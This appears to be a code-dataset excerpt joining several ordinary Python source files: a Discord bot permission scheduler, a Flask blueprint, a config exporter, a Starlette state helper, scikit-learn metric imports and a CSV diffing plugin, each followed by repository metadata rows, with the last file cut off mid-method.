await self.bot.get_channel(735863548596584478).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/25 9pm")
# Start 7/26 10am
elif 1595775600 <= int(math.floor(dt.timestamp())) < 1595775660:
for role in roles:
await self.bot.get_channel(735863552019136535).set_permissions(guild.get_role(role), overwrite=permstart)
print("Start 7/26 10am")
# End 7/26 9pm
elif 1595815200 <= int(math.floor(dt.timestamp())) < 1595815260:
for role in roles:
await self.bot.get_channel(735863543634722877).set_permissions(guild.get_role(role), overwrite=permend)
await self.bot.get_channel(735863552019136535).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/26 9pm")
# End 7/26 10pm
elif 1595818800 <= int(math.floor(dt.timestamp())) < 1595818860:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permend)
await self.bot.get_channel(735863560726380658).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/26 10pm")
# Vote 7/28 10pm
elif 1595991600 <= int(math.floor(dt.timestamp())) < 1595991660:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permvote)
print("Vote 7/28 10pm")
# End 7/30 10pm
elif 1596164400 <= int(math.floor(dt.timestamp())) < 1596164460:
for role in roles:
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permend)
print("End 7/30 10pm")
else:
if dt.minute == 0:
print("I need to know I'm running")
    @contest.before_loop
    async def before_contest(self):
        """Delay the first `contest` tick until the bot's cache is ready."""
        await self.bot.wait_until_ready()
| 69.821782 | 411 | 0.703417 | 13,951 | 0.989152 | 0 | 0 | 13,805 | 0.9788 | 13,702 | 0.971497 | 5,458 | 0.386982 |
d371bded9db80d5ecfc09ed0c62cf85341632ea2 | 254 | py | Python | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | NLP_Flask/app/data_manage_api/__init__.py | Gxy-2001/NLPPlat | f339c1a7452b979b413919cf4bc128bf45af52ef | [
"MIT"
] | null | null | null | from flask import Blueprint
api = Blueprint("data_manage_api", __name__)
from . import data_venation
from . import operator_manage
from . import model_manage
from . import resource_manage
from . import pipeline_manage
from . import trainedmodel_manage
| 23.090909 | 44 | 0.818898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.066929 |
d372157180938920e4a54857c2c755457a97eb30 | 5,349 | py | Python | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | 3 | 2021-12-10T10:26:15.000Z | 2022-02-11T08:34:31.000Z | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | null | null | null | cfg_exporter/exports/py_export.py | dong50252409/cfg_exporter | 8e6fdfef00dbb228eb34ffdf4c1c23a74f1d7e18 | [
"MIT"
] | 1 | 2022-02-11T09:16:00.000Z | 2022-02-11T09:16:00.000Z | import os
import typing
import cfg_exporter.custom as custom
from cfg_exporter.const import DataType
from cfg_exporter.const import TEMPLATE_EXTENSION
from cfg_exporter.exports.base.export import BaseExport
from cfg_exporter.lang_template import lang
from cfg_exporter.tables.base.type import DefaultValue
EXTENSION = 'py'
BASE_TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), 'template', EXTENSION)
BASE_TEMPLATE = f'{EXTENSION}_base.{TEMPLATE_EXTENSION}'
def _by_default(value):
"""
默认Iter类型格式化
"""
return f'{value}'
def _by_reference(replace_table):
"""
引用Iter类型格式化
"""
return lambda value: _get_reference(replace_table, value)
def _get_reference(replace_table, value):
key = _by_default(value)
if key in replace_table:
_, layer_num, index_num = replace_table[key]
return f'_rt_{layer_num}[{index_num}]'
return f'{value}'
# Iter类型格式化函数
_format_iter_value = _by_default
def format_value(value):
if isinstance(value, DataType.str):
return f'"{value}"'
elif isinstance(value, DataType.lang):
return f'"{lang(value.text)}"'
elif isinstance(value, DataType.iter):
return _format_iter_value(value)
elif isinstance(value, DefaultValue):
return format_value(value.text)
else:
return f'{value}'
# Overrides used by PyExport.data_type_detail(): maps a cfg data-type name to
# the Python type annotation string to emit; unlisted names pass through as-is.
_data_type_details = {
    'lang': 'str',
    'iter': 'typing.Union[list, tuple]',
    'raw': 'typing.Any'
}
class PyExport(BaseExport):
    """Exporter that renders each table as a Python module (``.py`` file)."""

    def __init__(self, args):
        # Expose `format_value` to the templates as a global helper.
        global_vars = {'format_value': format_value}
        super().__init__(args, BASE_TEMPLATE_PATH, [EXTENSION], global_vars)

    def export(self, table_obj) -> typing.NoReturn:
        """Render *table_obj* to ``<table_name>.py``.

        With ``args.py_optimize`` set, repeated iterable values are emitted
        once in a layered reference table and referenced elsewhere, and
        default values are pre-computed.
        """
        global _format_iter_value
        if self.args.py_optimize:
            replace_table, reference_table = _analyze_reference_table(table_obj)
            default_values = custom.analyze_default_value(table_obj)
            # Swap in the reference-aware formatter for iter-type values.
            _format_iter_value = _by_reference(replace_table)
        else:
            reference_table = []
            default_values = {}
            _format_iter_value = _by_default

        ctx = {
            'table_obj': table_obj, 'prefix': self.args.file_prefix,
            'reference_table': reference_table, 'default_values': default_values
        }
        table_name = table_obj.table_name
        filename = f'{table_name}.{EXTENSION}'
        # A table-specific extension template, when present, overrides the base one.
        if table_name in self.extend_templates.get(EXTENSION, []):
            self.render(filename, f'{table_name}.{EXTENSION}.{TEMPLATE_EXTENSION}', ctx)
        else:
            self.render(filename, BASE_TEMPLATE, ctx)

    def file_desc(self) -> str:
        """Header comment written at the top of every generated file."""
        return "######################################\n" \
               "# AUTO GENERATE BY CFG_EXPORTER #\n" \
               "######################################\n"

    @staticmethod
    def naming_convention() -> typing.Any:
        """Naming convention applied to generated identifiers (snake_case)."""
        import cfg_exporter.util as util
        return util.snake_case

    @staticmethod
    def data_type_detail(data_type_str) -> str:
        """Map a cfg data-type name to its Python type-annotation string."""
        return _data_type_details.get(data_type_str, data_type_str)
def _analyze_reference_table(table_obj):
    """Build the replace table and the layered reference table for *table_obj*.

    Only non-key columns of iter type contribute values.
    """
    replace_table = {}
    for field_name, data_type in zip(table_obj.field_names, table_obj.data_types):
        is_key_field = field_name in table_obj.key_field_name_iter
        if is_key_field:
            continue
        if data_type is not DataType.iter:
            continue
        for value in table_obj.data_iter_by_field_names(field_name):
            _stat_replace_table_layer(replace_table, value, 0)
    _stat_replace_table_index(replace_table)
    return replace_table, _stat_reference_table(replace_table)
def _stat_replace_table_layer(reference_table, value, layer_num):
    """Record *value* (and, recursively, nested iterables) keeping the deepest layer seen."""
    iter_type = DataType.iter.value.real_type
    if not isinstance(value, iter_type):
        return
    for child in value:
        if isinstance(child, iter_type):
            _stat_replace_table_layer(reference_table, child, layer_num + 1)
    key = _by_default(value)
    recorded = reference_table.get(key)
    if recorded is None or recorded[1] < layer_num:
        reference_table[key] = (value, layer_num)
def _stat_replace_table_index(reference_table):
    """Assign each replace-table entry its element index within its layer.

    Entries are rewritten in place from ``(value, layer_num)`` to
    ``(replaced_source, layer_num, index_num)``, where ``index_num`` is the
    position the value occupies in the per-layer list later built by
    `_stat_reference_table` (which appends in the same iteration order).
    """
    index_dict = {}
    for key, (value, layer_num) in reference_table.items():
        replace_rt = _replace_rt_table(reference_table, value)
        index = index_dict.get(layer_num, 0)
        # Advance the per-layer counter.  Previously the counter was stored
        # back unchanged, so every entry of a layer got index 0 and all
        # generated references pointed at the layer's first element.
        index_dict[layer_num] = index + 1
        reference_table[key] = (replace_rt, layer_num, index)
def _replace_rt_table(reference_table, value):
    """Render *value* as source text, substituting nested iterables with references."""
    if not isinstance(value, (list, tuple)):
        return f'{value}'
    parts = []
    for item in value:
        if isinstance(item, (list, tuple)):
            parts.append(_get_reference(reference_table, item))
        else:
            parts.append(f'{item}')
    body = ', '.join(parts)
    return f'[{body}]' if isinstance(value, list) else f'({body})'
def _stat_reference_table(replace_table):
"""
统计生成引用表
"""
rt_dict = {}
for rt_value, layer_num, _index_num in replace_table.values():
layer_list = rt_dict.get(layer_num, [])
layer_list.append(rt_value)
rt_dict[layer_num] = layer_list
return sorted(rt_dict.items(), key=lambda item: item[0], reverse=True)
| 30.392045 | 116 | 0.653019 | 1,616 | 0.294944 | 0 | 0 | 257 | 0.046906 | 0 | 0 | 835 | 0.1524 |
d372b26a4d6a57f99ba77b4687d599e40f2a2efe | 774 | py | Python | app/state.py | AnsGoo/cronJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 11 | 2021-06-27T05:00:09.000Z | 2022-02-15T14:31:21.000Z | app/state.py | AnsGoo/cornJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 1 | 2021-12-01T12:20:54.000Z | 2021-12-08T11:54:12.000Z | app/state.py | AnsGoo/cornJob | 0f9aedbe2ffe3c405376c13a7c2d24540360bd0e | [
"MIT"
] | 2 | 2021-06-27T05:00:16.000Z | 2021-08-09T06:36:09.000Z | from typing import Any
from starlette.datastructures import State
class DefaultState:
    """Thin wrapper around a shared Starlette ``State`` attribute store.

    ``state`` is a class attribute, so every ``DefaultState`` instance reads
    and writes the same underlying store.
    """

    state = State()

    def get(self, key: str, value: Any = None) -> Any:
        """Return attribute *key*, or the fallback *value*.

        Raises when *key* is absent and no fallback was supplied.
        """
        if hasattr(self.state, key):
            return getattr(self.state, key)
        # Compare against None (not truthiness) so falsy fallbacks such as
        # 0, '' or False are returned instead of raising.
        if value is None:
            raise Exception('state don`t %s attribute' % key)
        return value

    def set(self, key: str, value: Any) -> None:
        """Store *key* -> *value*; raises if *key* is already present."""
        if hasattr(self.state, key):
            raise Exception('state don`t %s attribute' % key)
        setattr(self.state, key, value)

    def update(self, key: str, value: Any) -> None:
        """Overwrite *key* only if it already exists; otherwise do nothing."""
        if hasattr(self.state, key):
            setattr(self.state, key, value)
# Module-level singleton shared by all importers of this module.
default_state = DefaultState()
| 24.1875 | 64 | 0.568475 | 671 | 0.866925 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.067183 |
d374a451e2dd0106d96875a415ef683426b13aa3 | 3,260 | py | Python | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | null | null | null | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | null | null | null | venv/lib/python2.7/site-packages/sklearn/metrics/__init__.py | bopopescu/fbserver | e812dbc4dc0cbf2fda19473015a3d7e253718a19 | [
"Apache-2.0"
] | 1 | 2020-07-23T19:26:19.000Z | 2020-07-23T19:26:19.000Z | """
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .metrics import (accuracy_score,
average_precision_score,
auc,
roc_auc_score,
classification_report,
confusion_matrix,
explained_variance_score,
f1_score,
fbeta_score,
hamming_loss,
hinge_loss,
jaccard_similarity_score,
log_loss,
matthews_corrcoef,
mean_squared_error,
mean_absolute_error,
precision_recall_curve,
precision_recall_fscore_support,
precision_score,
recall_score,
r2_score,
roc_curve,
zero_one_loss)
# Deprecated in 0.16
from .metrics import auc_score
from .scorer import make_scorer, SCORERS
from . import cluster
from .cluster import (adjusted_rand_score,
adjusted_mutual_info_score,
completeness_score,
homogeneity_completeness_v_measure,
homogeneity_score,
mutual_info_score,
normalized_mutual_info_score,
silhouette_score,
silhouette_samples,
v_measure_score,
consensus_score)
from .pairwise import (euclidean_distances,
pairwise_distances,
pairwise_distances_argmin_min,
pairwise_distances_argmin,
pairwise_kernels)
# Public API of this package.
# Note: 'pairwise_distances_argmin_min' used to appear twice in this list;
# the stray duplicate has been removed (duplicates in __all__ are harmless
# at runtime but misleading to readers and tools).
__all__ = ['accuracy_score',
           'adjusted_mutual_info_score',
           'adjusted_rand_score',
           'auc',
           'roc_auc_score',
           'average_precision_score',
           'classification_report',
           'cluster',
           'completeness_score',
           'confusion_matrix',
           'euclidean_distances',
           'explained_variance_score',
           'f1_score',
           'fbeta_score',
           'hamming_loss',
           'hinge_loss',
           'homogeneity_completeness_v_measure',
           'homogeneity_score',
           'jaccard_similarity_score',
           'log_loss',
           'matthews_corrcoef',
           'mean_squared_error',
           'mean_absolute_error',
           'mutual_info_score',
           'normalized_mutual_info_score',
           'pairwise_distances',
           'pairwise_distances_argmin',
           'pairwise_distances_argmin_min',
           'pairwise_kernels',
           'precision_recall_curve',
           'precision_recall_fscore_support',
           'precision_score',
           'r2_score',
           'recall_score',
           'roc_curve',
           'silhouette_score',
           'silhouette_samples',
           'v_measure_score',
           'consensus_score',
           'zero_one_loss',
           'make_scorer',
           'SCORERS']
| 33.265306 | 79 | 0.513497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 976 | 0.299387 |
d377cc64f12358cddf2bd8d3cd61a85effd3e4d2 | 29,736 | py | Python | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | dacman/plugins/csv/__init__.py | yocheah/dac-man | 758849decf26f40fdc89f10cd29b1340e344008d | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
from collections import defaultdict
import numpy as np
try:
import pandas as pd
except ImportError:
from dacman.core.utils import dispatch_import_error
dispatch_import_error(module_name='pandas', plugin_name='CSV')
from dacman.compare import base
try:
from IPython.display import display # for debugging
except ImportError:
display = print
class ChangeStatus:
    """String constants naming the change states of a compared item."""

    added = 'ADDED'
    deleted = 'DELETED'
    modified = 'MODIFIED'
    unchanged = 'UNCHANGED'
    unset = 'UNSET'

    @classmethod
    def iter(cls):
        """Yield the four externally meaningful statuses (``unset`` excluded)."""
        for status in (cls.added, cls.deleted, cls.modified, cls.unchanged):
            yield status
# Short module-internal alias for the change-status constants.
_S = ChangeStatus
class _InternalFields:
    """
    Utility class to access commonly used table/dict fields as constants rather than bare strings.
    """
    # Column names recording a value's position in the original CSV source.
    LOC_ORIG_ROW = '_loc_orig_row'
    LOC_ORIG_COL = '_loc_orig_col'
    # Column names for a value as read ('orig') vs. after processing ('calc').
    ORIG = 'orig'
    CALC = 'calc'
# Short module-internal alias for the internal field-name constants.
_F = _InternalFields
class ChangeMetricsBase:
    """
    Convenience class to access properties from items being compared and calculate comparison metrics from them.

    `a` and `b` are dict-like metadata mappings for the two sides; results are
    accumulated in an internal dict exposed through the item protocol.
    """

    def __init__(self, key, a=None, b=None):
        self.key = key
        self.a = a
        self.b = b
        # Accumulator for comparison results; 'metadata' separates properties
        # with a common value from properties whose values changed.
        self._comparison_data = {
            'status': _S.unset,
            'metadata': {
                'common': {},
                'changes': {},
            },
        }

    def __setitem__(self, key, val):
        self._comparison_data[key] = val

    def __getitem__(self, key):
        return self._comparison_data[key]

    def keys(self):
        # TODO maybe enforce some order?
        return self._comparison_data.keys()

    def add(self, other_data):
        """Merge *other_data* into the accumulated comparison results."""
        self._comparison_data.update(other_data)

    @property
    def properties(self):
        """Properties present in both items, preserving `a`'s ordering."""
        # only interested in common fields, since we have to compare them directly
        # return self.a.keys() & self.b.keys()
        # use a dict with dummy values as an ordered set to preserve the order
        dict_for_ordered_set = {key: None for key in self.a.keys() if key in self.b.keys()}
        return dict_for_ordered_set.keys()

    @property
    def is_missing_a(self):
        # An empty mapping means the item does not exist on side "a".
        return len(self.a) == 0

    @property
    def is_missing_b(self):
        return len(self.b) == 0

    def change_in(self, prop):
        """Return True if *prop* is common to both items and its value differs."""
        if prop not in self.properties:
            return False
        try:
            return self.a[prop] != self.b[prop]
        except Exception as e:
            # The comparison itself failed (e.g. incomparable types):
            # report it and treat the property as unchanged.
            print(e)
            return False

    def get_value_common(self, prop):
        """Return the shared value of *prop*, or None when absent/changed."""
        if prop in self.properties and not self.change_in(prop):
            return self.a[prop]
        # maybe use a sentinel value other than None here?
        return None

    def get_value_single(self, prop):
        """Return *prop* from whichever item exists (or the common value)."""
        if self.is_missing_a:
            return self.b[prop]
        if self.is_missing_b:
            return self.a[prop]
        return self.get_value_common(prop)

    def get_values(self, prop, orient=dict, convert=None, as_type=None, fallback=None):
        """Return *prop* from both items as a tuple or an ``{'a': ..., 'b': ...}`` dict.

        *convert* (alias *as_type*) is applied to both values; *fallback* is
        used when *prop* is missing from an item.
        """
        if convert is None and as_type is not None:
            convert = as_type
        convert = convert or (lambda x: x)
        val_a = convert(self.a.get(prop, fallback))
        val_b = convert(self.b.get(prop, fallback))
        if orient in {tuple, list}:
            return val_a, val_b
        if orient in {dict}:
            return {'a': val_a, 'b': val_b}

    @property
    def is_modified(self):
        # TODO change if we use multiple modified states
        return self['status'] in {_S.modified}

    @is_modified.setter
    def is_modified(self, val):
        if bool(val) is True:
            # TODO manage other types as extra "modified" characterizers
            # e.g. if `val` is a list, append to self['modified_labels']
            self['status'] = _S.modified

    def store_common_value_or_values(self, prop):
        """File *prop* under 'changes' (marking the item modified) or 'common'."""
        # TODO there could be some redundant logic in general in this class
        if self.change_in(prop):
            self['metadata']['changes'][prop] = self.get_values(prop, orient=dict)
            self.is_modified = True
        else:
            self['metadata']['common'][prop] = self.get_value_single(prop)

    def calculate(self, exclude=None):
        """Compute the change status and the per-property metadata.

        *exclude* lists properties to skip (e.g. bulky values compared elsewhere).
        """
        exclude = exclude or set()
        if self.is_missing_a:
            self['status'] = _S.added
        elif self.is_missing_b:
            self['status'] = _S.deleted
        for prop in self.properties:
            if prop not in exclude:
                self.store_common_value_or_values(prop)
        if self['status'] == _S.unset:
            self['status'] = _S.unchanged
class TableColumnChangeMetrics(ChangeMetricsBase):
    """Change metrics for a single table column.

    Column-level metadata is compared by the base class; per-value changes
    are folded in afterwards via `calculate_from_value_metrics`.
    """
    # NOTE: the previous pass-through __init__ (calling super() with the same
    # arguments) was redundant and has been removed.

    def calculate(self):
        """Compare the column metadata, excluding the raw values frame.

        The values frame is compared separately, so it is excluded here.
        A set is passed (instead of the bare string 'values_frame') so the
        base class's ``prop not in exclude`` test is a proper membership
        check rather than a substring match.  The base class already maps a
        leftover 'unset' status to 'unchanged', so no extra check is needed.
        """
        super().calculate(exclude={'values_frame'})

    def calculate_from_value_metrics(self, value_metrics_table):
        """Fold per-value change metrics into this column's metrics."""
        col_metrics_from_value_metrics = self.get_column_metrics_from_values(value_metrics_table)
        if col_metrics_from_value_metrics['frac_changed'] > 0.:
            self.is_modified = True
        self['values'] = col_metrics_from_value_metrics

    def get_column_metrics_from_values(self, metrics_table):
        """Aggregate the per-value metrics table into per-status counts."""
        m = {}
        df = metrics_table
        n_total = len(df)
        m['n_unchanged'] = (df['status'] == _S.unchanged).sum()
        m['n_added'] = (df['status'] == _S.added).sum()
        m['n_deleted'] = (df['status'] == _S.deleted).sum()
        m['n_modified'] = (df['status'] == _S.modified).sum()
        m['n_changed'] = (m['n_added'] + m['n_deleted'] + m['n_modified'])
        m['frac_changed'] = m['n_changed'] / n_total
        # Delta statistics are only meaningful when at least one delta exists
        # (i.e. the column supported numeric subtraction).
        if not (df['delta'].isnull().all()):
            m['delta_mean'] = df['delta'].mean()
            m['delta_std'] = df['delta'].std()
        return m

    def get_stats(self):
        """Return a flat summary dict: column name, value metrics, status."""
        stats = {'name': self.key}
        stats.update(self['values'])
        stats['status'] = self['status']
        return stats
class _BaseRecord:
@staticmethod
def default_key_getter(item):
raise NotImplementedError
def __init__(self, key_getter=None, **kwargs):
super().__init__(**kwargs)
self.key_getter = key_getter or type(self).default_key_getter
self._mapping = self.get_mapping()
def get_mapping(self):
return {}
def keys(self):
return self._mapping.keys()
def __getitem__(self, key):
return self._mapping[key]
def get_empty(self):
return dict()
def get(self, key):
# TODO should we customize the default return type at the level of the class or of the instance?
return self._mapping.get(key, self.get_empty())
class TableColumnsRecord(_BaseRecord):
    """Record exposing one metadata dict per column of a loader-provided table."""
    # TODO this class should probably also deal with the field renames,
    # i.e. should receive a mapping with the field renames

    def __init__(self, loader, **kwargs):
        # The loader must be set before the base __init__, which immediately
        # calls get_mapping() (and therefore needs `self.loader`).
        self.loader = loader
        super().__init__(**kwargs)

    @property
    def dataframe(self):
        """The table produced by the loader, with dtypes applied."""
        return self.loader.to_table_dtype()

    def get_metadata(self, series, name):
        """Collect comparison metadata for a single column."""
        md = {}
        md['name'] = name
        md['series'] = series
        md['dtype'] = series.dtype
        md['n_notnull'] = series.notnull().sum()
        md['n_null'] = series.isna().sum()
        return md

    @staticmethod
    def default_key_getter(col_metadata):
        # Must be a staticmethod, matching the base class: _BaseRecord.__init__
        # stores `type(self).default_key_getter` and later calls it with a
        # single argument.  Defined as a plain instance method (as it was
        # before), that call raised a TypeError because the metadata dict was
        # bound to the `self` slot.
        return col_metadata['name']

    def get_mapping(self):
        df = self.dataframe
        mapping = {}
        for colname in df:
            # TODO in general the metadata collecting can also be done directly in the Record,
            # since here we don't have several types of items at the same level like in the HDF5 plug-in
            col_md = self.get_metadata(series=df[colname], name=colname)
            # we don't need a specific record for table fields, since these are collected as metadata of the columns
            mapping[self.key_getter(col_md)] = col_md
        return mapping
def get_lines_frame(path, comment_char=None):
    """Read lines and associated metadata from a file.

    Returns a DataFrame with one row per line and columns: ``content`` (the
    raw line, newline included), ``lineno`` (1-based), and ``is_comment``
    (True when the line starts with *comment_char*).
    """
    with Path(path).open() as f:
        lines = pd.DataFrame({'content': list(f)})
    lines['lineno'] = lines.index + 1

    def is_comment(s):
        if comment_char is None:
            # No comment character defined: no line is a comment.
            # (Previously expressed as `s == np.nan`, which yields all-False
            # only because NaN compares unequal to everything — obscure.)
            return pd.Series(False, index=s.index)
        return (s
                .astype(str)
                .str.startswith(comment_char)
                )

    lines['is_comment'] = is_comment(lines['content'])
    return lines
def infer_dtypes(data, converters=None):
    """Try to coerce an object-dtype series to a richer dtype.

    Converters are attempted in order and the first that succeeds wins.
    The order is relevant: strings representing floats can be read
    (erroneously) as datetimes, but the reverse is not true, so
    ``pd.to_numeric`` must come before ``pd.to_datetime``.
    """
    if data.dtype != 'object':
        return data
    for convert in (converters or [pd.to_numeric, pd.to_datetime]):
        try:
            return convert(data)
        except (TypeError, ValueError):
            continue
    return data
class ColumnnProcessor:
    """
    Utility class to perform per-column processing and hold data in various formats
    as needed to create the column-level metadata.
    """

    def __init__(self, data_orig, name=None):
        self.data_orig = data_orig   # column values exactly as read from the source
        self.data_calc = None        # values after header/rename/dtype processing
        self.name = name
        self.header = {}             # header fields extracted for this column

    def process_header(self, data, pos_mapper=None, pos='rel', **kwargs):
        """Extract header cells from *data*, store them, and drop them.

        *pos* selects how positions are interpreted:
          - 'rel': relative, counted from the start of the subrange (iloc);
          - 'abs': absolute, using the original row location index (loc).
        Header positions come from *pos_mapper*, or directly from **kwargs.
        """
        indexer = data.iloc
        if pos.startswith('abs'):
            indexer = data.loc
        pos_mapper = pos_mapper or kwargs
        to_drop = []
        for key, position in pos_mapper.items():
            self.header[key] = indexer[position]
            to_drop.append(position)
        return data.drop(indexer[to_drop].index)

    def process_rename(self, data, mapper):
        """Resolve the column's final name: header 'name' field, then *mapper* renames."""
        self.name = self.header.get('name', self.name)
        self.name = mapper.get(self.name, self.name)
        if self.name:
            data.name = self.name
        return data

    def process_dtype(self, data, dtype):
        """Coerce *data* to its target dtype.

        ``dtype=True`` infers dtypes; otherwise *dtype* is a (possibly empty
        or None) mapping from column name to target dtype.
        """
        if dtype is True:
            data = infer_dtypes(data)
        else:
            if dtype is None:
                dtype = {}
            # astype() returns a new object, so the result must be assigned
            # back; previously it was discarded and the cast never applied.
            data = data.astype(dtype.get(self.name, data.dtype))
        return data

    def get_values_frame(self, data_orig, data_calc, index=None):
        """Build a two-column frame with original and calculated values.

        The resulting index is, in order of precedence: the data column
        passed as *index*; the original row locations (``index='orig'``);
        or a plain reset index.  In every case the original row location
        remains available as a column.
        """
        df = pd.DataFrame({_F.ORIG: data_orig, _F.CALC: data_calc}, index=data_calc.index)
        if isinstance(index, str) and index == 'orig':
            df = df.reset_index().set_index(df.index.name, drop=False)
        elif index is not None:
            # assumes *index* is a named Series aligned with data_calc — TODO confirm
            df = pd.merge(index, df, how='left', left_index=True, right_index=True).reset_index().set_index(index.name)
        else:
            # make sure the original row location ends up as a column of this table
            df = df.reset_index()
        return df
class CSVTableColumnsRecord(_BaseRecord):
    """
    Convert a CSV file into a table, and expose a record as Column in the usual way
    """

    def __init__(self,
                 src,
                 comment_char=None,
                 drop_empty_cols=True,
                 table_range=None,
                 header=None,
                 column_renames=None,
                 index=None,
                 dtype=None,
                 ):
        # Note: the base __init__ is deliberately not called here; the mapping
        # starts empty and is populated explicitly by load().
        self.src = src
        self.comment_char = comment_char
        self.drop_empty_cols = drop_empty_cols
        self.table_range = table_range or {}       # {'row_start': ..., 'row_end': ...} (1-based)
        self.header = header or {}                 # options forwarded to ColumnnProcessor.process_header
        self.column_renames = column_renames or {}
        self.dtype = dtype
        self.index = index                         # name of the column to use as table index, if any

        self._mapping = {}

    @staticmethod
    def get_lines_frame(path, comment_char=None):
        """Read lines and associated metadata from a file"""
        with Path(path).open() as f:
            lines = pd.DataFrame({'content': list(f)})
        lines['lineno'] = lines.index + 1

        def is_comment(s):
            if comment_char is None:
                # get a series with the same index where all values are False
                return s == np.nan
            return (s
                    .astype(str)
                    .str.startswith(comment_char)
                    )
        lines['is_comment'] = is_comment(lines['content'])
        return lines

    def get_lineno_loadable(self):
        """
        Return a sequence containing the line numbers (1-based) of lines in the source
        that are loadable by the CSV parser.

        This is used to associate table index/rows with their position in the source.
        """
        def is_skipped_by_csv_parser(s):
            # TODO redo this with more robust values
            # (and maybe invert the logic to "is_included" while we're at it)
            return s.astype(str) == '\n'
        # TODO all of this could probably be merged in a regex
        def is_loadable(df):
            return ~(df['is_comment'] | is_skipped_by_csv_parser(df['content']))
        lines = get_lines_frame(self.src, comment_char=self.comment_char)
        return (lines
                [is_loadable]
                ['lineno']
                .to_list()
                )

    def get_table_orig(self, index_col=_F.LOC_ORIG_ROW):
        """Load the raw CSV table (all-object dtype) indexed by original line number.

        The configured table_range (1-based rows) is translated into the
        parser's skiprows/nrows options.
        """
        load_opts = dict(dtype=object, header=None, comment=self.comment_char)
        table_range = {'row_start': 1, 'row_end': None}
        table_range.update(self.table_range)
        row_idx_start = table_range['row_start'] - 1
        row_idx_end = None
        try:
            row_idx_end = table_range['row_end'] - 1
        except TypeError:
            # row_end is None: read to the end of the file.
            pass
        load_opts['skiprows'] = range(0, row_idx_start)
        if row_idx_end is not None:
            # TODO check for off-by-1 errors
            load_opts['nrows'] = row_idx_end - row_idx_start
        df = pd.read_csv(self.src, **load_opts)
        # Attach each parsed row's original (1-based) line number as the index.
        lineno = self.get_lineno_loadable()[row_idx_start:row_idx_end]
        return (df
                .assign(**{_F.LOC_ORIG_ROW: lineno})
                .set_index(index_col, drop=True)
                )

    def get_metadata(self, col_processor, index=None):
        """Collect the metadata dict for a processed column."""
        md = {}
        md['colidx'] = col_processor.colidx
        md['name'] = col_processor.name
        md['header'] = col_processor.header
        md['values_frame'] = col_processor.get_values_frame(col_processor.data_orig,
                                                            col_processor.data_calc,
                                                            index=index)
        return md

    @staticmethod
    def key_getter(metadata):
        # Columns are keyed by their resolved name.
        return metadata['name']

    # TODO a more detailed name for this could be "get_column_metadata_mapping"
    def get_mapping(self):
        """Process every column of the raw table and map name -> column metadata."""
        df = self.get_table_orig()
        if self.drop_empty_cols:
            df = df.dropna(axis='columns', how='all')
        processors = []
        index = None
        for col in df:
            proc = ColumnnProcessor(df[col], name=col)
            proc.colidx = col
            # Header extraction, renaming and dtype coercion, in that order.
            proc.data_calc = (proc.data_orig
                              .pipe(proc.process_header, **self.header)
                              .pipe(proc.process_rename, self.column_renames)
                              .pipe(proc.process_dtype, dtype=self.dtype)
                              )
            # Columns that end up without a name are dropped from the record.
            if proc.name:
                processors.append(proc)
            proc.is_index = (proc.name == self.index)
            if proc.is_index:
                index = proc.data_calc
        mapping = {}
        for proc in processors:
            md = self.get_metadata(proc, index=index)
            mapping[self.key_getter(md)] = md
        return mapping

    def load(self):
        """Populate the record's mapping from the source file."""
        self._mapping = self.get_mapping()
        # this is just for display/reference, and it's not used for actual calculations
        # self.table_calc = pd.DataFrame({name: md['values_frame']['calc'] for name, md in self._mapping.items()})

    def get_empty(self):
        # Empty placeholder with the same values_frame schema as real columns.
        return {'values_frame': pd.DataFrame([], columns=[_F.ORIG, _F.CALC, _F.LOC_ORIG_ROW])}
class TableValuesRecord(_BaseRecord):
    """Record keyed by (column, row), exposing individual table cells."""

    def __init__(self, src: pd.DataFrame, **kwargs):
        # src must be set before the base __init__ triggers get_mapping().
        self.src = src
        super().__init__(**kwargs)

    def get_mapping(self):
        # Flatten the frame cell by cell ("the anti-pandas"); kept only as an
        # example of a value-level record.
        mapping = {}
        for colname in self.src:
            column = self.src[colname]
            for row_idx in column.index:
                mapping[(colname, row_idx)] = column[row_idx]
        return mapping
class TableColumnValuesChangeMetrics:
    """
    Calculate change metrics on a per-value basis using indexed containers.

    Instead of calculating value-level changes as a separate step,
    i.e. creating a Record from each values frame and looping over matching pairs,
    we use the fact that the value frame's index allow vectorized operations with similar semantics.
    """

    @classmethod
    def from_column_metrics(cls, col_metrics):
        """Alternate constructor: pull both values frames from a column metrics object."""
        values_a, values_b = col_metrics.get_values('values_frame', orient=tuple)
